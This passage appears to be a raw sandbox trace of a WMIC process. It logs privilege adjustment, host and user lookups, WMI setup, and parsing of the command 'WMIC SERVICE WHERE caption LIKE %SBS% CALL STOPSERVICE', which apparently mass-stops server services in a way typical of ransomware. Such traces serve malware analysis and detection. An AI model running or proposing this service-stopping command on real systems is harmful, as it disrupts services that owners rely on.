[5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0x1349510 | out: ppv=0x1349510*=0x598048) returned 0x0 [0112.583] GetCurrentProcess () returned 0xffffffff [0112.583] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x28, TokenHandle=0x36f85c | out: TokenHandle=0x36f85c*=0x158) returned 1 [0112.583] GetTokenInformation (in: TokenHandle=0x158, TokenInformationClass=0x3, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x36f858 | out: TokenInformation=0x0, ReturnLength=0x36f858) returned 0 [0112.583] GetTokenInformation (in: TokenHandle=0x158, TokenInformationClass=0x3, TokenInformation=0x7c3a08, TokenInformationLength=0x118, ReturnLength=0x36f858 | out: TokenInformation=0x7c3a08, ReturnLength=0x36f858) returned 1 [0112.583] AdjustTokenPrivileges (in: TokenHandle=0x158, DisableAllPrivileges=0, NewState=0x7c3a08*(PrivilegesCount=0x17, Privileges=((Luid.LowPart=0x5, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x8, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x9, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xa, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xb, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xc, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xd, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xe, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xf, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x11, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x12, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x13, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x16, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x17, Luid.HighPart=0, Attributes=0x3), (Luid.LowPart=0x18, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x19, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x1c, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x1d, Luid.HighPart=0, Attributes=0x3), (Luid.LowPart=0x1e, Luid.HighPart=0, Attributes=0x3), (Luid.LowPart=0x21, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x22, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x23, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0112.583] CloseHandle (hObject=0x158) returned 1 [0112.583] SetThreadUILanguage (LangId=0x0) returned 0x409 [0112.586] _vsnwprintf (in: _Buffer=0x7c3a98, _BufferCount=0x1f, _Format="ms_%x", _ArgList=0x36f7e4 | out: _Buffer="ms_409") returned 6 [0112.586] GetComputerNameW (in: lpBuffer=0x7c3ae0, nSize=0x36f848 | out: lpBuffer="LHNIWSJ", nSize=0x36f848) returned 1 [0112.586] lstrlenW (lpString="LHNIWSJ") returned 7 [0112.586] lstrlenW (lpString="LHNIWSJ") returned 7 [0112.586] ResolveDelayLoadedAPI () returned 0x74d5c5f0 [0112.586] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x0, nSize=0x36f85c | out: lpNameBuffer=0x0, nSize=0x36f85c) returned 0x0 [0112.587] GetLastError () returned 0xea [0112.587] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x7c3b20, nSize=0x36f85c | out: lpNameBuffer="LHNIWSJ\\CIiHmnxMn6Ps", nSize=0x36f85c) returned 0x1 [0112.587] lstrlenW (lpString="") returned 0 [0112.587] lstrlenW (lpString="LHNIWSJ") returned 7 [0112.587] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="LHNIWSJ", cchCount1=7, lpString2="", cchCount2=0) returned 3 [0112.588] lstrlenW (lpString=".") returned 1 [0112.588] lstrlenW (lpString="LHNIWSJ") returned 7 [0112.588] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="LHNIWSJ", cchCount1=7, lpString2=".", cchCount2=1) returned 3 [0112.588] lstrlenW (lpString="LOCALHOST") returned 9 [0112.588] lstrlenW (lpString="LHNIWSJ") returned 7 [0112.588] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="LHNIWSJ", cchCount1=7, lpString2="LOCALHOST", cchCount2=9) returned 1 [0112.588] lstrlenW (lpString="LHNIWSJ") returned 7 [0112.588] lstrlenW (lpString="LHNIWSJ") returned 7 [0112.588] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="LHNIWSJ", cchCount1=7, lpString2="LHNIWSJ", cchCount2=7) returned 2 [0112.588] lstrlenW (lpString="LHNIWSJ") returned 7 [0112.588] lstrlenW (lpString="LHNIWSJ") returned 7 [0112.588] lstrlenW (lpString="LHNIWSJ") returned 7 [0112.589] lstrlenW (lpString="LHNIWSJ") returned 7 [0112.589] ResolveDelayLoadedAPI () returned 0x77bb9840 [0112.591] SysStringLen (param_1="IDENTIFY") returned 0x8 [0112.591] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0112.591] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0112.591] SysStringLen (param_1="IDENTIFY") returned 0x8 [0112.591] SysStringLen (param_1="IMPERSONATE") returned 0xb [0112.591] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0112.591] SysStringLen (param_1="IMPERSONATE") returned 0xb [0112.591] SysStringLen (param_1="IDENTIFY") returned 0x8 [0112.591] SysStringLen (param_1="IDENTIFY") returned 0x8 [0112.591] SysStringLen (param_1="IMPERSONATE") returned 0xb [0112.591] SysStringLen (param_1="DELEGATE") returned 0x8 [0112.591] SysStringLen (param_1="IDENTIFY") returned 0x8 [0112.591] SysStringLen (param_1="DELEGATE") returned 0x8 [0112.591] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0112.591] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0112.591] SysStringLen (param_1="DELEGATE") returned 0x8 [0112.591] SysStringLen (param_1="NONE") returned 0x4 [0112.591] SysStringLen (param_1="DEFAULT") returned 0x7 [0112.591] SysStringLen (param_1="DEFAULT") returned 0x7 [0112.591] SysStringLen (param_1="NONE") returned 0x4 [0112.591] SysStringLen (param_1="CONNECT") returned 0x7 [0112.591] SysStringLen (param_1="DEFAULT") returned 0x7 [0112.592] SysStringLen (param_1="CALL") returned 0x4 [0112.592] SysStringLen (param_1="DEFAULT") returned 0x7 [0112.592] SysStringLen (param_1="CALL") returned 0x4 [0112.592] SysStringLen (param_1="CONNECT") returned 0x7 [0112.592] SysStringLen (param_1="PKT") returned 0x3 [0112.592] SysStringLen (param_1="DEFAULT") returned 0x7 [0112.592] SysStringLen (param_1="PKT") returned 0x3 [0112.592] SysStringLen (param_1="NONE") returned 0x4 [0112.592] SysStringLen (param_1="NONE") returned 0x4 [0112.592] SysStringLen (param_1="PKT") returned 0x3 [0112.592] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0112.592] SysStringLen (param_1="DEFAULT") returned 0x7 [0112.592] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0112.592] SysStringLen (param_1="NONE") returned 0x4 [0112.592] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0112.592] SysStringLen (param_1="PKT") returned 0x3 [0112.592] SysStringLen (param_1="PKT") returned 0x3 [0112.592] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0112.592] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0112.592] SysStringLen (param_1="DEFAULT") returned 0x7 [0112.592] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0112.592] SysStringLen (param_1="PKT") returned 0x3 [0112.592] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0112.592] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0112.592] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0112.592] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0112.592] GetSystemDirectoryW (in: lpBuffer=0x7c29d8, uSize=0x105 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0112.592] SysStringLen (param_1="C:\\Windows\\system32") returned 0x13 [0112.592] SysStringLen (param_1="\\wbem\\") returned 0x6 [0112.593] SysStringByteLen (bstr="C:\\Windows\\system32\\wbem\\") returned 0x32 [0112.593] SysStringLen (param_1="C:\\Windows\\system32\\wbem\\") returned 0x19 [0112.593] SysStringLen (param_1="XSL-Mappings.xml") returned 0x10 [0112.593] GetCurrentThreadId () returned 0xe8c [0112.593] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Wbem\\CIMOM", ulOptions=0x0, samDesired=0x1, phkResult=0x36f36c | out: phkResult=0x36f36c*=0x164) returned 0x0 [0112.593] RegQueryValueExW (in: hKey=0x164, lpValueName="Logging", lpReserved=0x0, lpType=0x0, lpData=0x36f378, lpcbData=0x36f374*=0x400 | out: lpType=0x0, lpData=0x36f378*=0x30, lpcbData=0x36f374*=0x4) returned 0x0 [0112.593] _wcsicmp (_String1="0", _String2="1") returned -1 [0112.593] _wcsicmp (_String1="0", _String2="2") returned -2 [0112.593] RegQueryValueExW (in: hKey=0x164, lpValueName="Logging Directory", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x36f374*=0x4 | out: lpType=0x0, lpData=0x0, lpcbData=0x36f374*=0x42) returned 0x0 [0112.593] RegQueryValueExW (in: hKey=0x164, lpValueName="Logging Directory", lpReserved=0x0, lpType=0x0, lpData=0x7c2be0, lpcbData=0x36f374*=0x42 | out: lpType=0x0, lpData=0x7c2be0*=0x25, lpcbData=0x36f374*=0x42) returned 0x0 [0112.593] lstrlenW (lpString="%systemroot%\\system32\\wbem\\Logs\\") returned 32 [0112.593] lstrlenW (lpString="%systemroot%\\system32\\wbem\\Logs\\") returned 32 [0112.593] RegQueryValueExW (in: hKey=0x164, lpValueName="Log File Max Size", lpReserved=0x0, lpType=0x0, lpData=0x36f378, lpcbData=0x36f374*=0x400 | out: lpType=0x0, lpData=0x36f378*=0x36, lpcbData=0x36f374*=0xc) returned 0x0 [0112.593] _wtol (_String="65536") returned 65536 [0112.593] RegCloseKey (hKey=0x0) returned 0x6 [0112.593] CoCreateInstance (in: rclsid=0x1306a7c*(Data1=0xf6d90f12, Data2=0x9c73, Data3=0x11d3, Data4=([0]=0xb3, [1]=0x2e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0xb, [7]=0xb4)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x1306a8c*(Data1=0x2933bf95, Data2=0x7b36, Data3=0x11d2, Data4=([0]=0xb2, [1]=0xe, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x98, [6]=0x3e, [7]=0x60)), ppv=0x36f80c | out: ppv=0x36f80c*=0x7745a8) returned 0x0 [0112.603] FreeThreadedDOMDocument:IXMLDOMDocument:Load (in: This=0x7745a8, xmlSource=0x36f78c*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Windows\\system32\\wbem\\XSL-Mappings.xml", varVal2=0x0), isSuccessful=0x36f7f0 | out: isSuccessful=0x36f7f0*=0xffff) returned 0x0 [0112.649] FreeThreadedDOMDocument:IXMLDOMDocument:get_documentElement (in: This=0x7745a8, DOMElement=0x36f804 | out: DOMElement=0x36f804) returned 0x0 [0112.651] SysStringLen (param_1="VALUE") returned 0x5 [0112.651] SysStringLen (param_1="TABLE") returned 0x5 [0112.651] SysStringLen (param_1="TABLE") returned 0x5 [0112.651] SysStringLen (param_1="VALUE") returned 0x5 [0112.651] SysStringLen (param_1="LIST") returned 0x4 [0112.651] SysStringLen (param_1="TABLE") returned 0x5 [0112.651] SysStringLen (param_1="RAWXML") returned 0x6 [0112.651] SysStringLen (param_1="TABLE") returned 0x5 [0112.651] SysStringLen (param_1="RAWXML") returned 0x6 [0112.651] SysStringLen (param_1="LIST") returned 0x4 [0112.651] SysStringLen (param_1="LIST") returned 0x4 [0112.651] SysStringLen (param_1="RAWXML") returned 0x6 [0112.652] SysStringLen (param_1="HTABLE") returned 0x6 [0112.652] SysStringLen (param_1="TABLE") returned 0x5 [0112.652] SysStringLen (param_1="HTABLE") returned 0x6 [0112.652] SysStringLen (param_1="LIST") returned 0x4 [0112.652] SysStringLen (param_1="HFORM") returned 0x5 [0112.652] SysStringLen (param_1="TABLE") returned 0x5 [0112.652] SysStringLen (param_1="HFORM") returned 0x5 [0112.652] SysStringLen (param_1="LIST") returned 0x4 [0112.652] SysStringLen (param_1="HFORM") returned 0x5 [0112.652] SysStringLen (param_1="HTABLE") returned 0x6 [0112.653] SysStringLen (param_1="XML") returned 0x3 [0112.653] SysStringLen (param_1="TABLE") returned 0x5 [0112.653] SysStringLen (param_1="XML") returned 0x3 [0112.653] SysStringLen (param_1="VALUE") returned 0x5 [0112.653] SysStringLen (param_1="VALUE") returned 0x5 [0112.653] SysStringLen (param_1="XML") returned 0x3 [0112.653] SysStringLen (param_1="MOF") returned 0x3 [0112.653] SysStringLen (param_1="TABLE") returned 0x5 [0112.653] SysStringLen (param_1="MOF") returned 0x3 [0112.653] SysStringLen (param_1="LIST") returned 0x4 [0112.653] SysStringLen (param_1="MOF") returned 0x3 [0112.653] SysStringLen (param_1="RAWXML") returned 0x6 [0112.653] SysStringLen (param_1="LIST") returned 0x4 [0112.653] SysStringLen (param_1="MOF") returned 0x3 [0112.654] SysStringLen (param_1="CSV") returned 0x3 [0112.654] SysStringLen (param_1="TABLE") returned 0x5 [0112.654] SysStringLen (param_1="CSV") returned 0x3 [0112.654] SysStringLen (param_1="LIST") returned 0x4 [0112.654] SysStringLen (param_1="CSV") returned 0x3 [0112.654] SysStringLen (param_1="HTABLE") returned 0x6 [0112.654] SysStringLen (param_1="CSV") returned 0x3 [0112.654] SysStringLen (param_1="HFORM") returned 0x5 [0112.654] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0112.654] SysStringLen (param_1="TABLE") returned 0x5 [0112.654] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0112.654] SysStringLen (param_1="VALUE") returned 0x5 [0112.654] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0112.654] SysStringLen (param_1="XML") returned 0x3 [0112.654] SysStringLen (param_1="XML") returned 0x3 [0112.654] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0112.655] SysStringLen (param_1="texttablewsys") returned 0xd [0112.655] SysStringLen (param_1="TABLE") returned 0x5 [0112.655] SysStringLen (param_1="texttablewsys") returned 0xd [0112.655] SysStringLen (param_1="XML") returned 0x3 [0112.655] SysStringLen (param_1="texttablewsys") returned 0xd [0112.655] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0112.655] SysStringLen (param_1="XML") returned 0x3 [0112.655] SysStringLen (param_1="texttablewsys") returned 0xd [0112.655] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0112.655] SysStringLen (param_1="TABLE") returned 0x5 [0112.655] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0112.655] SysStringLen (param_1="XML") returned 0x3 [0112.655] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0112.655] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0112.655] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0112.655] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0112.656] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0112.656] SysStringLen (param_1="TABLE") returned 0x5 [0112.656] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0112.656] SysStringLen (param_1="XML") returned 0x3 [0112.656] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0112.656] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0112.656] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0112.656] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0112.656] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0112.656] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0112.656] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0112.656] SysStringLen (param_1="TABLE") returned 0x5 [0112.656] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0112.656] SysStringLen (param_1="XML") returned 0x3 [0112.656] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0112.656] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0112.656] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0112.656] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0112.656] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0112.656] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0112.657] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0112.657] SysStringLen (param_1="TABLE") returned 0x5 [0112.657] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0112.657] SysStringLen (param_1="XML") returned 0x3 [0112.657] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0112.657] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0112.657] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0112.657] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0112.657] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0112.657] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0112.657] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0112.657] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0112.657] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0112.657] SysStringLen (param_1="TABLE") returned 0x5 [0112.657] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0112.657] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0112.657] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0112.657] SysStringLen (param_1="XML") returned 0x3 [0112.657] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0112.658] SysStringLen (param_1="texttablewsys") returned 0xd [0112.658] SysStringLen (param_1="XML") returned 0x3 [0112.658] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0112.658] SysStringLen (param_1="htable-sortby") returned 0xd [0112.658] SysStringLen (param_1="TABLE") returned 0x5 [0112.658] SysStringLen (param_1="htable-sortby") returned 0xd [0112.658] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0112.658] SysStringLen (param_1="htable-sortby") returned 0xd [0112.658] SysStringLen (param_1="XML") returned 0x3 [0112.658] SysStringLen (param_1="htable-sortby") returned 0xd [0112.658] SysStringLen (param_1="texttablewsys") returned 0xd [0112.658] SysStringLen (param_1="htable-sortby") returned 0xd [0112.658] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0112.658] SysStringLen (param_1="XML") returned 0x3 [0112.658] SysStringLen (param_1="htable-sortby") returned 0xd [0112.659] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0112.659] SysStringLen (param_1="TABLE") returned 0x5 [0112.659] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0112.659] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0112.659] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0112.659] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0112.659] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0112.659] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0112.659] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0112.659] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0112.659] SysStringLen (param_1="wmiclimofformat") returned 0xf [0112.659] SysStringLen (param_1="TABLE") returned 0x5 [0112.659] SysStringLen (param_1="wmiclimofformat") returned 0xf [0112.659] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0112.659] SysStringLen (param_1="wmiclimofformat") returned 0xf [0112.659] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0112.659] SysStringLen (param_1="wmiclimofformat") returned 0xf [0112.659] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0112.659] SysStringLen (param_1="wmiclimofformat") returned 0xf [0112.659] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0112.659] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0112.659] SysStringLen (param_1="wmiclimofformat") returned 0xf [0112.660] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0112.660] SysStringLen (param_1="TABLE") returned 0x5 [0112.660] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0112.660] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0112.660] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0112.660] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0112.660] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0112.660] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0112.660] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0112.660] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0112.660] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0112.660] SysStringLen (param_1="TABLE") returned 0x5 [0112.660] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0112.660] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0112.660] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0112.660] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0112.660] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0112.660] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0112.660] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0112.660] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0112.660] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0112.660] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0112.661] FreeThreadedDOMDocument:IUnknown:Release (This=0x7745a8) returned 0x0 [0112.661] GetCommandLineW () returned="WMIC SERVICE WHERE 'caption LIKE '%SBS%'' CALL STOPSERVICE" [0112.661] memcpy_s (in: _Destination=0x7c8040, _DestinationSize=0x7e, _Source=0x591588, _SourceSize=0x76 | out: _Destination=0x7c8040) returned 0x0 [0112.661] GetLocalTime (in: lpSystemTime=0x36f7b4 | out: lpSystemTime=0x36f7b4*(wYear=0x7e2, wMonth=0x4, wDayOfWeek=0x0, wDay=0xf, wHour=0xa, wMinute=0x9, wSecond=0x5, wMilliseconds=0x20e)) [0112.661] _vsnwprintf (in: _Buffer=0x7c80c8, _BufferCount=0x3f, _Format="%.2d-%.2d-%.4dT%.2d:%.2d:%.2d", _ArgList=0x36f794 | out: _Buffer="04-15-2018T10:09:05") returned 19 [0112.661] lstrlenW (lpString=" SERVICE WHERE 'caption LIKE '%SBS%'' CALL STOPSERVICE") returned 55 [0112.661] lstrlenW (lpString=" SERVICE WHERE 'caption LIKE '%SBS%'' CALL STOPSERVICE") returned 55 [0112.661] lstrlenW (lpString=" SERVICE WHERE 'caption LIKE '%SBS%'' CALL STOPSERVICE") returned 55 [0112.661] lstrlenW (lpString=" SERVICE WHERE 'caption LIKE '%SBS%'' CALL STOPSERVICE") returned 55 [0112.661] lstrlenW (lpString=" SERVICE WHERE 'caption LIKE '%SBS%'' CALL STOPSERVICE") returned 55 [0112.661] lstrlenW (lpString=" SERVICE WHERE 'caption LIKE '%SBS%'' CALL STOPSERVICE") returned 55 [0112.661] lstrlenW (lpString="SERVICE") returned 7 [0112.661] _wcsicmp (_String1="SERVICE", _String2="\"NULL\"") returned 81 [0112.661] lstrlenW (lpString=" SERVICE WHERE 'caption LIKE '%SBS%'' CALL STOPSERVICE") returned 55 [0112.661] lstrlenW (lpString="WHERE") returned 5 [0112.661] _wcsicmp (_String1="WHERE", _String2="\"NULL\"") returned 85 [0112.661] memmove_s (in: _Destination=0x7c2c78, _DestinationSize=0x4, _Source=0x7c2c68, _SourceSize=0x4 | out: _Destination=0x7c2c78) returned 0x0 [0112.662] lstrlenW (lpString=" SERVICE WHERE 'caption LIKE '%SBS%'' CALL STOPSERVICE") returned 55 [0112.662] lstrlenW (lpString="'caption LIKE '%SBS%''") returned 22 [0112.662] _wcsicmp (_String1="'caption LIKE '%SBS%''", _String2="\"NULL\"") returned 5 [0112.662] lstrlenW (lpString="'caption LIKE '%SBS%''") returned 22 [0112.662] lstrlenW (lpString="'caption LIKE '%SBS%''") returned 22 [0112.662] memmove_s (in: _Destination=0x7c7e30, _DestinationSize=0x8, _Source=0x7c2c78, _SourceSize=0x8 | out: _Destination=0x7c7e30) returned 0x0 [0112.662] lstrlenW (lpString=" SERVICE WHERE 'caption LIKE '%SBS%'' CALL STOPSERVICE") returned 55 [0112.662] lstrlenW (lpString="CALL") returned 4 [0112.662] _wcsicmp (_String1="CALL", _String2="\"NULL\"") returned 65 [0112.662] memmove_s (in: _Destination=0x7c7f80, _DestinationSize=0xc, _Source=0x7c7e30, _SourceSize=0xc | out: _Destination=0x7c7f80) returned 0x0 [0112.662] lstrlenW (lpString=" SERVICE WHERE 'caption LIKE '%SBS%'' CALL STOPSERVICE") returned 55 [0112.662] lstrlenW (lpString="STOPSERVICE") returned 11 [0112.662] _wcsicmp (_String1="STOPSERVICE", _String2="\"NULL\"") returned 81 [0112.662] memmove_s (in: _Destination=0x7c2478, _DestinationSize=0x10, _Source=0x7c7f80, _SourceSize=0x10 | out: _Destination=0x7c2478) returned 0x0 [0112.662] lstrlenW (lpString="QUIT") returned 4 [0112.662] lstrlenW (lpString="SERVICE") returned 7 [0112.662] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="SERVICE", cchCount1=7, lpString2="QUIT", cchCount2=4) returned 3 [0112.662] lstrlenW (lpString="EXIT") returned 4 [0112.662] lstrlenW (lpString="SERVICE") returned 7 [0112.662] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="SERVICE", cchCount1=7, lpString2="EXIT", cchCount2=4) returned 3 [0112.662] WbemLocator:IUnknown:AddRef (This=0x598048) returned 0x2 [0112.662] lstrlenW (lpString="/") returned 1 [0112.662] lstrlenW (lpString="SERVICE") returned 7 [0112.662] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="SERVICE", cchCount1=7, lpString2="/", cchCount2=1) returned 3 [0112.662] lstrlenW (lpString="-") returned 1 [0112.662] lstrlenW (lpString="SERVICE") returned 7 [0112.662] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="SERVICE", cchCount1=7, lpString2="-", cchCount2=1) returned 3 [0112.662] lstrlenW (lpString="CLASS") returned 5 [0112.662] lstrlenW (lpString="SERVICE") returned 7 [0112.662] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="SERVICE", cchCount1=7, lpString2="CLASS", cchCount2=5) returned 3 [0112.662] lstrlenW (lpString="PATH") returned 4 [0112.662] lstrlenW (lpString="SERVICE") returned 7 [0112.662] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="SERVICE", cchCount1=7, lpString2="PATH", cchCount2=4) returned 3 [0112.662] lstrlenW (lpString="CONTEXT") returned 7 [0112.662] lstrlenW (lpString="SERVICE") returned 7 [0112.662] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="SERVICE", cchCount1=7, lpString2="CONTEXT", cchCount2=7) returned 3 [0112.663] lstrlenW (lpString="SERVICE") returned 7 [0112.663] lstrlenW (lpString="SERVICE") returned 7 [0112.663] GetCurrentThreadId () returned 0xe8c [0112.663] ??0CHString@@QAE@XZ () returned 0x36f708 [0112.663] WbemLocator:IWbemLocator:ConnectServer (in: This=0x598048, strNetworkResource="root\\cli", strUser=0x0, strPassword=0x0, strLocale="ms_409", lSecurityFlags=0, strAuthority=0x0, pCtx=0x0, ppNamespace=0x1349540 | out: ppNamespace=0x1349540*=0x5c0828) returned 0x0 [0112.686] CoSetProxyBlanket (pProxy=0x5c0828, dwAuthnSvc=0xffffffff, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0 [0112.686] ??1CHString@@QAE@XZ () returned 0x74a66430 [0112.686] GetCurrentThreadId () returned 0xe8c [0112.686] ??0CHString@@QAE@XZ () returned 0x36f6b0 [0112.686] SysStringLen (param_1="root\\cli") returned 0x8 [0112.686] SysStringLen (param_1="\\") returned 0x1 [0112.686] SysStringLen (param_1="root\\cli\\") returned 0x9 [0112.686] SysStringLen (param_1="ms_409") returned 0x6 [0112.687] WbemLocator:IWbemLocator:ConnectServer (in: This=0x598048, strNetworkResource="root\\cli\\ms_409", strUser=0x0, strPassword=0x0, strLocale="ms_409", lSecurityFlags=0, strAuthority=0x0, pCtx=0x0, ppNamespace=0x1349544 | out: ppNamespace=0x1349544*=0x5c0648) returned 0x0 [0112.695] ??1CHString@@QAE@XZ () returned 0x74a66430 [0112.695] GetCurrentThreadId () returned 0xe8c [0112.695] ??0CHString@@QAE@XZ () returned 0x36f70c [0112.695] lstrlenA (lpString="MSFT_CliAlias.FriendlyName='") returned 28 [0112.695] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1301478, cbMultiByte=-1, lpWideCharStr=0x7c89e8, cchWideChar=29 | out: lpWideCharStr="MSFT_CliAlias.FriendlyName='") returned 29 [0112.695] SysStringLen (param_1="MSFT_CliAlias.FriendlyName='") returned 0x1c [0112.695] SysStringLen (param_1="SERVICE") returned 0x7 